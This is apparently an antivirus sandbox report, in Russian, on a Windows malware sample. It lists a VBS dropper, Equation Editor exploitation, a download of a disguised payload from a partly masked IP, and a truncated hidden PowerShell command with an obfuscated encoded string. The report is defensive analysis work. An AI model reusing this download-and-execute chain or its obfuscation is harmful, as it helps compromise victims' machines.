Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\wearenotunderstandbaseswee.vBS"
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\wearenotunderstandbaseswee.vbs
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\i3nmat9z\config14[1].txt
Сетевая активность
Подключается к
- '19#.#10.150.33':80
- 'ia#####4.us.archive.org':443
TCP
Запросы HTTP GET
- http://19#.#10.150.33/150/wearenotunderstandbasesweet.tIF
Другие
- 'ia#####4.us.archive.org':443
UDP
- DNS ASK ia#####4.us.archive.org
Другое
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⟈ ⋐ ⩉ ⯅ ≌Bp⟈ ⋐ ⩉ ⯅ ≌G0⟈ ⋐ ⩉ ⯅ ≌YQBn⟈ ⋐ ⩉ ⯅ ≌GU⟈ ⋐ ⩉ ⯅ ≌VQBy⟈ ⋐ ⩉ ⯅ ≌Gw⟈ ⋐ ⩉ ⯅ ≌I⟈ ⋐ ⩉ ⯅ ≌⟈ ⋐ ⩉ ⯅ ≌9⟈ ⋐ ⩉ ⯅ ≌C⟈ ⋐ ⩉ ⯅ ≌⟈ ⋐ ⩉ ⯅ ≌JwBo⟈ ⋐ ⩉ ⯅ ≌HQ⟈ ⋐ ⩉ ⯅ ≌d⟈ ⋐ ⩉ ⯅ ≌Bw⟈ ⋐ ⩉ ⯅ ≌... (со скрытым окном)
